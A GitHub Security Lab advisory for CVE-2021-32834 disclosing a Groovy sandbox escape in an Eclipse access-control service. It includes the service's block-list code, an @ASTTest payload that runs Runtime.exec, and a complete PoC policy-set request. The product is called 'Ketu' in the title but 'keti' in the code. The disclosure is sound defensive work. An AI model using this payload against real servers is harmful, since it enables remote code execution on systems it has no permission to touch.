

# GHSL-2021-063: Arbitrary code execution in Eclipse Ketu - CVE-2021-32834



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## Coordinated Disclosure Timeline

- 2021-04-27: Reported to security@eclipse.org
- 2021-07-26: Disclosure deadline is reached.
- 2021-08-16: Report is made [public](#) in Eclipse system.
- 2021-09-01: Disclosing as per our disclosure policy.

## Summary

A user able to create Policy Sets can run arbitrary code by sending malicious Groovy scripts which will escape the configured Groovy sandbox.

## Product

Eclipse Ketu

## Tested Version

Latest commit at the date of reporting (a1c8dbe)

## Details

### Issue 1: Arbitrary Groovy script evaluation

The PolicySet object received by createPolicySet in [PolicyManagementController](#) flows into a Groovy script evaluation.

```
@RequestMapping(method = PUT, value = POLICY_SET_URL, consumes = MediaType.APPLICATION_JSON_VALUE)
public ResponseEntity<String> createPolicySet(@RequestBody final PolicySet policySet,
    @PathVariable("policySetId") final String policySetId) {

    validatePolicyIdOrFail(policySet, policySetId);

    try {
        this.service.upsertPolicySet(policySet);
        URI policySetUri = UriTemplateUtils.expand(POLICY_SET_URL, "policySetId:" + policySet.getName());
        return created(policySetUri.getPath());
    } catch (PolicyManagementException e) {
        throw new RestApiException(HttpStatus.UNPROCESSABLE_ENTITY, e.getMessage(), e);
    }
}
```

this.service.upsertPolicySet(policySet); is defined in [PolicyManagementServiceImpl](#)

```
public void upsertPolicySet(final PolicySet policySet) {

    String policySetName = policySet.getName();

    try {
        ZoneEntity zone = this.zoneResolver.getZoneEntityOrFail();

        validatePolicySet(zone, policySet);

        String policySetPayload = this.jsonUtils.serialize(policySet);
        upsertPolicySetInTransaction(policySetName, zone, policySetPayload);
    } catch (Exception e) {
        handleException(e, policySetName);
    }
}
```

validatePolicySet(zone, policySet); ends up calling validatePolicySet on [PolicySetValidatorImpl](#)

```
@Override
public void validatePolicySet(final PolicySet policySet) {
    validateSchema(policySet);
    for (Policy p : policySet.getPolicies()) {
        validatePolicyConditions(p.getConditions());
        validatePolicyActions(p);
    }
}
```

Since PolicySet conditions are basically Groovy expressions, validatePolicyConditions(p.getConditions()); will end up [parsing them](#) as [Groovy scripts](#):

```
ConditionScript compiledScript = conditionCache.get(script);
if (compiledScript == null) {
    Script groovyScript = this.shell.parse(script);
    compiledScript = new GroovyConditionScript(groovyScript);
    conditionCache.put(script, compiledScript);
}
```

Arbitrary evaluation of Groovy expressions allow attackers to run arbitrary code.

### Issue 2: Groovy Sandbox escape

The Groovy Shell used to parse and evaluate the PolicySet conditions is sandboxed by:

1. Using a SecureASTCustomizer which disables method definitions, disallow all imports, set an allow-list for constant type classes and receiver classes.

```
private static SecureASTCustomizer createSecureASTCustomizer() {
    SecureASTCustomizer secureASTCustomizer = new SecureASTCustomizer();
    // Allow closures.
    secureASTCustomizer.setClosuresAllowed(true);
    // Disallow method definition.
    secureASTCustomizer.setMethodDefinitionAllowed(false);
    // Disallow all imports by setting a blank whitelist.
    secureASTCustomizer.setImportsWhitelist(Collections.emptyList());
    // Disallow star imports by setting a blank whitelist.
    secureASTCustomizer.setStarImportsWhitelist(Arrays.asList(
        "org.crsh.command.*", "org.crsh.cli.*", "org.crsh.groovy.*",
        "org.eclipse.ketu.acs.commons.policy.condition.*"));
    // Set white list for constant type classes.
    secureASTCustomizer.setConstantTypesClassesWhitelist(Arrays.asList(
        Boolean.class, boolean.class, Collection.class, Double.class, double.class, Float.class,
        float.class, Integer.class, int.class, Long.class, long.class, Object.class, String.class));
}
```

```

secureASTCustomizer.setReceiversClassesWhiteList(Arrays.asList(
    Boolean.class, Collection.class, Integer.class, Iterable.class, Object.class, Set.class,
    String.class));
return secureASTCustomizer;
}

```

1. Configures an AST transformation customizer which relies on [GroovySecureExtension](#) to further limit which method calls are allowed:

```

private static ASTTransformationCustomizer createASTTransformationCustomizer() {

    return new ASTTransformationCustomizer(singletonMap("extensions",
        singletonList("org.eclipse.keti.acs.commons.policy.condition.groovy.GroovySecureExtension")),
        CompileStatic.class);
}

```

This extension uses both, an allow-list and block-list to limit variable access and method calls to a small set of known good variables/methods:

```

public void onMethodSelection(final Expression expression, final MethodNode target) {
    // First the white list.
    if (!("org.eclipse.keti.acs.commons.policy.condition.AbstractHandler"
        .equals(target.getDeclaringClass().getName()))
        && (!"org.eclipse.keti.acs.commons.policy.condition.AbstractHandlers"
        .equals(target.getDeclaringClass().getName()))
        && (!"org.eclipse.keti.acs.commons.policy.condition.ResourceHandler"
        .equals(target.getDeclaringClass().getName()))
        && (!"org.eclipse.keti.acs.commons.policy.condition.SubjectHandler"
        .equals(target.getDeclaringClass().getName()))
        && (!"org.eclipse.keti.acs.commons.policy.condition.groovy.AttributeMatcher"
        .equals(target.getDeclaringClass().getName())) && (!"java.lang.Boolean"
        .equals(target.getDeclaringClass().getName())) && (!"java.lang.Integer"
        .equals(target.getDeclaringClass().getName())) && (!"java.lang.Iterable"
        .equals(target.getDeclaringClass().getName())) && (!"java.lang.Object"
        .equals(target.getDeclaringClass().getName())) // This means we allow collections of type Object.
        && (!"Ljava.lang.Object;".equals(target.getDeclaringClass().getName())) && (!"java.lang.String"
        .equals(target.getDeclaringClass().getName())) && (!"java.util.Collection"
        .equals(target.getDeclaringClass().getName())) && (!"java.util.Set"
        .equals(target.getDeclaringClass().getName())) {
        addStaticTypeError("Method call for '" + target.getDeclaringClass().getName() + "' class is not allowed!",
            expression);
    }

    // Then the black list.
    if ("java.lang.System".equals(target.getDeclaringClass().getName())) {
        addStaticTypeError("Method call for 'java.lang.System' class is not allowed!", expression);
    }
    if ("groovy.util.Eval".equals(target.getDeclaringClass().getName())) {
        addStaticTypeError("Method call for 'groovy.util.Eval' class is not allowed!", expression);
    }
    if ("java.io".equals(target.getDeclaringClass().getName())) {
        addStaticTypeError("Method call for 'java.io' package is not allowed!", expression);
    }
    if ("execute".equals(target.getName())) {
        addStaticTypeError("Method call 'execute' is not allowed!", expression);
    }
}

```

However, as explained in [Orange Tsai's blog post](#), Groovy meta-programming can be used to bypass these protections. For example, the `@ASTTest` annotation allows developers to assert other AST transformations. Since it is an annotation, it is not visited by the `onMethodSelection` method of `ASTTransformationCustomizer` and the assertion call is not subject to further inspection. Therefore, it is possible to run arbitrary code from these assertions, for example:

```
@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec("touch /tmp/pwned")}) def x
```

## PoC request

```

PUT /v1/policy-set/default
Authorization: bearer <token>
Accept: application/json
Content-Type: application/json
Predix-Zone-Id: demo

```

```

{
  "name": "default",
  "policies": [
    {
      "name": "Analysts can access engines if they belong to the same group.",
      "target": {
        "resource": {
          "name": "Engine",
          "uriTemplate": "/engines/{engine_id}"
        },
        "action": "GET",
        "subject": {
          "name": "Analysts",
          "attributes": [
            {
              "issuer": "https://acs.predix.io",
              "name": "role",
              "value": "analyst"
            }
          ]
        }
      },
      "conditions": [
        {
          "name": "is a member of the same group",
          "condition": "@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec('touch /tmp/pwned-keti')}) def x"
        }
      ],
      "effect": "PERMIT"
    },
    {
      "name": "Deny all other requests.",
      "effect": "DENY"
    }
  ]
}

```

## Impact

These issue may lead to post-authentication Remote Code execution.

## CVE

- CVE-2021-32834

## Credit

This issue was discovered and reported by GHSL team member [@pwntester \(Alvaro Muñoz\)](#).

## Contact

You can contact the GHSL team at [securitylab@github.com](mailto:securitylab@github.com), please include a reference to GHSL-2021-063 in any communication regarding this issue.

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